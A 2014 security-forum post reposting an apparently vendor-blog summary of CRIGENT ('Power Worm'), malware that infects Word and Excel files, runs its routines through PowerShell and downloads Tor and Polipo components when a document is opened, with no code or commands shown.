1. Welcome Guest! In order to create a new topic or reply to an existing one, you must register first. It is easy and free. Click here to sign up now!.
    Dismiss Notice

Mar 27 Word and Excel Files Infected Using Windows PowerShell

Discussion in 'Security Updates' started by snoopy, Mar 29, 2014.

  1. snoopy

    snoopy Registered Members

    Joined:
    Aug 1, 2010
    Messages:
    1,671
    Location:
    At my computer
    Operating System:
    Windows 7
    Computer Brand or Motherboard:
    custom built -
    Malware targeting Word and Excel files has been around for some time, but we recently encountered a new malware family, CRIGENT (also known as “Power Worm”) which brings several new techniques to the table. (We detect these files as W97M_CRIGENT.A and X97M_CRIGENT.A.)

    Most significantly, instead of creating or including executable code, CRIGENT uses the Windows PowerShell to carry out its routines. PowerShell is a powerful interactive shell/scripting tool that is available for all current versions of Windows (and is built-in from Windows 7 onwards); this malware carries out all its behavior via PowerShell scripts. IT administrators that are normally on the lookout for malicious binaries may overlook this, as malware using this technique is not particularly common.

    Arrival and Additional Components

    This particular threat arrives as an infected Word or Excel document, which may be dropped by other malware or downloaded/accessed by users. When opened, right away it downloads two additional components from two well-known online anonymity projects: the Tor network, and Polipo, a personal web cache/proxy.

    More details plus screenshot here: http://blog.trendmicro.com/trendlab...reBlog+(Trendlabs+Security+Intelligence+Blog)
     
    snoopy, Mar 29, 2014
    #1

Share This Page